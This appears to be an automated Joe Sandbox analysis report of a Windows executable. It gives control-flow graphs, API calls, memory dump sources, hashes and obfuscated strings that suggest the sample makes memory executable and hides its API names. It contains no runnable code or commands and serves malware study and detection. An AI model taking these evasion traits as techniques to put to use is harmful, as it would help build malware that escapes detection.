                      control_flow_graph 726 417392-4173b0 727 4173c2 726->727 728 4173b2-4173bc 726->728 730 4173cc-41745c 727->730 728->727 729 417178-41717f 728->729 731 417185 call 417194 729->731 736 41746f-417484 730->736 737 41745e-41746a 730->737 733 41718a-4171d0 731->733 735 4171d7-41729e 733->735 738 4172a0-4172b6 735->738 739 4172b8-4172c8 735->739 740 417497-4174b6 736->740 741 417486-417492 736->741 742 417760-41777d NtQueryDefaultLocale 737->742 743 41731b-417322 738->743 739->735 744 4172ce-4172e1 739->744 745 4174c9-4174db 740->745 746 4174b8-4174c4 740->746 741->742 748 417783-417797 call 417793 742->748 749 417976-4179ed call 4179be call 4179df 742->749 750 417364-417383 call 417392 743->750 751 417324-417330 call 417331 743->751 744->735 752 4172e7-4172f7 744->752 753 4174dd-4174e9 745->753 754 4174ee-417557 745->754 746->742 777 4179fe-417a24 749->777 768 417388-4173b0 750->768 751->730 757 417305 752->757 758 4172f9-417303 752->758 753->742 763 417754-41775a 754->763 764 41755d-4175a7 754->764 767 41730f-417315 757->767 758->767 763->742 770 4175b8-4175c9 764->770 767->743 768->727 768->728 772 41766a-41774d 770->772 773 4175cf-4175df 770->773 772->742 773->772 775 4175e5-417636 call 4175f9 773->775 785 417638-41765a 775->785 786 41765c 775->786 783 417a31 777->783 784 417a26-417b0d call 417a72 777->784 783->777 785->786 788 417663 785->788 786->770 788->772
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: 8559aa4969c40f675b4cd1f9f73b98c6e439462239589a78c3a98b9b6be796fb
                      • Instruction ID: 40b7d06c97448d86c1a270aa7c36750fc6de399d16cd6f64c5ffe682ee30b168
                      • Opcode Fuzzy Hash: 8559aa4969c40f675b4cd1f9f73b98c6e439462239589a78c3a98b9b6be796fb
                      • Instruction Fuzzy Hash: D2519CB1D142288AEB28CB24CC91BEAB774FB84310F1085FED809A6785E7785EC5CF45

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 797 417150-41715b 798 41715d-417167 797->798 799 41716c-417172 797->799 800 4173cc-41745c 798->800 801 417178-4171d0 call 417194 799->801 807 41746f-417484 800->807 808 41745e-41746a 800->808 806 4171d7-41729e 801->806 809 4172a0-4172b6 806->809 810 4172b8-4172c8 806->810 811 417497-4174b6 807->811 812 417486-417492 807->812 813 417760-41777d NtQueryDefaultLocale 808->813 814 41731b-417322 809->814 810->806 815 4172ce-4172e1 810->815 816 4174c9-4174db 811->816 817 4174b8-4174c4 811->817 812->813 819 417783-417797 call 417793 813->819 820 417976-4179ed call 4179be call 4179df 813->820 821 417364-4173b0 call 417392 814->821 822 417324-417330 call 417331 814->822 815->806 823 4172e7-4172f7 815->823 824 4174dd-4174e9 816->824 825 4174ee-417557 816->825 817->813 850 4179fe-417a24 820->850 840 4173c2 821->840 841 4173b2-4173bc 821->841 822->800 828 417305 823->828 829 4172f9-417303 823->829 824->813 834 417754-41775a 825->834 835 41755d-4175a7 825->835 838 41730f-417315 828->838 829->838 834->813 843 4175b8-4175c9 835->843 838->814 840->800 841->801 841->840 845 41766a-41774d 843->845 846 4175cf-4175df 843->846 845->813 846->845 848 4175e5-417636 call 4175f9 846->848 858 417638-41765a 848->858 859 41765c 848->859 856 417a31 850->856 857 417a26-417b0d call 417a72 850->857 856->850 858->859 861 417663 858->861 859->843 861->845
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: 951c1df2d68f1c750ff19a24e47d2a09d0dc83768a3e2a61ccc96b38049be344
                      • Instruction ID: ca70d50cd5c06a718f5c79da80a6357d70341d19d53b56bd5887671d71e679ad
                      • Opcode Fuzzy Hash: 951c1df2d68f1c750ff19a24e47d2a09d0dc83768a3e2a61ccc96b38049be344
                      • Instruction Fuzzy Hash: 6B519EB1C142298AEB288B24CD51BFAB674FB84310F1085FED809A6745E7785EC5CF45
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: c3c90d3b250bbcfa4ebb4e780f936f7d109596887f35de6f9dabc3c3fa40a17b
                      • Instruction ID: d7077440ffb973997c2c65a63ae73799d6faea50f7925444badd62112ed53e83
                      • Opcode Fuzzy Hash: c3c90d3b250bbcfa4ebb4e780f936f7d109596887f35de6f9dabc3c3fa40a17b
                      • Instruction Fuzzy Hash: 8D41C7B3D142249FF7248A10DC55BE77B79EB84710F1480BAE80D56781D67C9FC68E92
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: c344707cfbab93dcc97d1c11e4f3f2b1d6c2ec5e440ddba98dd8b3829dc6d8af
                      • Instruction ID: c42c5b1f42dffbf49fc5b76768434c5c7e43c850f319e5ac3534525e9833c05b
                      • Opcode Fuzzy Hash: c344707cfbab93dcc97d1c11e4f3f2b1d6c2ec5e440ddba98dd8b3829dc6d8af
                      • Instruction Fuzzy Hash: 0C31E6B2D185145BF7188A11DC5AAF77778EB80310F1481BFD90E672C0DA7D6A828E52
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 105654f194b1627633bd327a17a53a427163800dc8890f4475b953e3d5da5d0b
                      • Instruction ID: 7436e0e746358629e4f8e39342140078f633d27b8fe66c8979fcf4bf99a85519
                      • Opcode Fuzzy Hash: 105654f194b1627633bd327a17a53a427163800dc8890f4475b953e3d5da5d0b
                      • Instruction Fuzzy Hash: A7312671A086694BDB21CA2ACCD0BFF7BB5BF85305F2480EAC54D96612D6389EC18F04
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: 06d5c9794d8d57c481778b69232e8bfb20827cf3ec91a33535f4b85e44c2e031
                      • Instruction ID: 1a9d6a56da613c3e124693ceaa02ee6937be5dd04992d6ccc678fb320fd92598
                      • Opcode Fuzzy Hash: 06d5c9794d8d57c481778b69232e8bfb20827cf3ec91a33535f4b85e44c2e031
                      • Instruction Fuzzy Hash: 4721B4B2D146288FE728CE10DC51BEA7B78EB84710F1444FED80DA6381E2799EC68F41
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004161B3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: 5e41cf81bc49552ec0bd2f866dfcefea69de4807ac8950e51b0aea78a5133b5d
                      • Instruction ID: 8530c9daf85036f2b28dea0e77ba6b3b63cebd812c7b4b0bd49625614f365b20
                      • Opcode Fuzzy Hash: 5e41cf81bc49552ec0bd2f866dfcefea69de4807ac8950e51b0aea78a5133b5d
                      • Instruction Fuzzy Hash: 8F21B771D182595FEB24CB64CCD0BEA7BB0FF01314F1101EAD95DA6281E6789AC1CF56
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: 7ff223e79ca8f048b1b444e690bc145ba258bca302289f52182bb24b15d065cd
                      • Instruction ID: 6a91514e6bed7dcf4f863cbc0522c8695a9ded1c02f6e32326fea26212f5a16c
                      • Opcode Fuzzy Hash: 7ff223e79ca8f048b1b444e690bc145ba258bca302289f52182bb24b15d065cd
                      • Instruction Fuzzy Hash: 1CE0C272E083588AE730DF229C41BDAB778AF40710F0044AFE00995982E278E6CA8E46

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 308 4066db-4066de 309 41d8de-41d8f4 308->309 310 41d8f6 309->310 311 41d8fd 309->311 312 41d904-41d955 310->312 316 41d869-41d879 310->316 311->312 314 41d963-41d981 call 41d991 312->314 315 41d957-41d961 312->315 324 41d986-41d990 314->324 317 41d9d2-41d9d9 315->317 316->312 319 41d87f-41d8d0 316->319 322 41d9e9 317->322 323 41d9db-41d9e7 317->323 319->310 325 41d8d2-41d8d8 319->325 326 41d9fa-41da25 VirtualProtect 322->326 323->326 324->317 325->309 328 41da27-41f370 call 41da41 call 41f371 326->328
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: B4GA$E$P$c$e$i$o$r$s$s$t$x
                      • API String ID: 544645111-3409965509
                      • Opcode ID: 045d9014f80a99a546df6506c6ee09ec708b008df3bde6707462fbf6d299fbac
                      • Instruction ID: 7c2c2f91dbc6670ca05046b9be9ead0856f4a96fe15c102968989db437ed7b02
                      • Opcode Fuzzy Hash: 045d9014f80a99a546df6506c6ee09ec708b008df3bde6707462fbf6d299fbac
                      • Instruction Fuzzy Hash: D47105B1D086688BE720CA14CC947FB7BB4EB42305F1481FAC84D66641D63D9EC68F92

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 338 41d991-41d9ba 339 41d9c8 338->339 340 41d9bc-41d9c6 338->340 341 41d9d2-41d9d9 339->341 340->341 342 41d9e9 341->342 343 41d9db-41d9e7 341->343 344 41d9fa-41da25 VirtualProtect 342->344 343->344 346 41da27-41f370 call 41da41 call 41f371 344->346
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: E$P$c$e$i$o$r$s$s$t$x
                      • API String ID: 544645111-3128998556
                      • Opcode ID: db82872b34bc3d4f552e77ac304a2551a86206f802105a463868d0a939822a0a
                      • Instruction ID: 6a63ad6f5d7440d5b6abbd82c09b1e506eb7b05f559da2c88fcd2854066f675e
                      • Opcode Fuzzy Hash: db82872b34bc3d4f552e77ac304a2551a86206f802105a463868d0a939822a0a
                      • Instruction Fuzzy Hash: D741ECB1D086689FFB20C624CC547EA7BF4EB41304F1481EBD88D66681D67D5EC58F51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 356 41ffb3-41ffb6 357 41ffbc-41ffe5 356->357 358 41fff7 357->358 359 41ffe7-41fff1 357->359 361 420001-420091 358->361 359->358 360 41fdad-41fe05 359->360 363 41fe0c-41fed3 call 41fea9 360->363 364 420093-42009f 361->364 365 4200a4-4200b9 361->365 378 41fed5-41feeb 363->378 379 41feed-41fefd 363->379 367 420395-4203a3 ExitProcess 364->367 368 4200bb-4200c7 365->368 369 4200cc-4200eb 365->369 368->367 372 4200fe-420110 369->372 373 4200ed-4200f9 369->373 376 420112-42011e 372->376 377 420123-42018c 372->377 373->367 376->367 383 420192-4201dc 377->383 384 420389-42038f 377->384 381 41ff50-41ff57 378->381 379->363 382 41ff03-41ff16 379->382 387 41ff99-41ffbb call 41ffb3 381->387 388 41ff59-41ff97 381->388 382->363 389 41ff1c-41ff2c 382->389 385 4201de-4201e7 383->385 386 4201ed-4201fe 383->386 384->367 385->386 391 420204-420214 386->391 392 42029f-4202b1 call 4202b2 386->392 387->357 388->361 393 41ff3a 389->393 394 41ff2e-41ff38 389->394 391->392 396 42021a-42026b call 42022a 391->396 397 41ff44-41ff4a 393->397 394->397 403 420291 396->403 404 42026d-42028f 396->404 397->381 403->385 404->403 405 420298 404->405 405->392
                      APIs
                      • ExitProcess.KERNEL32(00000000), ref: 004203A3
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: $JMCL
                      • API String ID: 621844428-1225520770
                      • Opcode ID: dd48e54cf680fd271e0dab93154a7b8b0d676f741f1781182f2fb917eeab6552
                      • Instruction ID: 1f1a233c4ea98c28e290184e1d0bc566697d54f42b4a2dd98467d57f08cf4de7
                      • Opcode Fuzzy Hash: dd48e54cf680fd271e0dab93154a7b8b0d676f741f1781182f2fb917eeab6552
                      • Instruction Fuzzy Hash: 64C15CB5E042288BEB24CF14DD90AEAB7B6FB88300F1481EAD90DA7341D7795ED18F55

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 504 41f810-41f821 505 41f823-41f85f 504->505 506 41f864-41f8c2 504->506 510 4203a1-4203a3 ExitProcess 505->510 508 41f8d5-41f8ea 506->508 509 41f8c4-41f8d0 506->509 512 41f8fd-41f91c 508->512 513 41f8ec-41f8f8 508->513 511 41fbc6-41fbcd 509->511 514 41fca1-41fcce call 41fcb2 call 41fccf 511->514 515 41fbd3-41fbe0 call 41fbe1 511->515 516 41f92f-41f941 512->516 517 41f91e-41f92a 512->517 513->511 514->510 515->514 520 41f943-41f94f 516->520 521 41f954-41f9bd 516->521 517->511 520->511 525 41f9c3-41fa0d 521->525 526 41fbba-41fbc0 521->526 528 41fa1e-41fa2f 525->528 526->511 530 41fad0-41fb21 call 41faef 528->530 531 41fa35-41fa45 528->531 539 41fb23-41fb2d 530->539 540 41fb2f-41fb86 call 41fb40 530->540 531->530 532 41fa4b-41fa9c 531->532 534 41fac2 532->534 535 41fa9e-41fac0 532->535 534->528 535->534 537 41fac9 535->537 537->530 542 41fb9e-41fba5 539->542 546 41fb94 540->546 547 41fb88-41fb92 540->547 544 41fbb5 542->544 545 41fba7-41fbb3 542->545 544->511 545->511 546->542 547->542
                      APIs
                      • ExitProcess.KERNEL32(00000000), ref: 004203A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
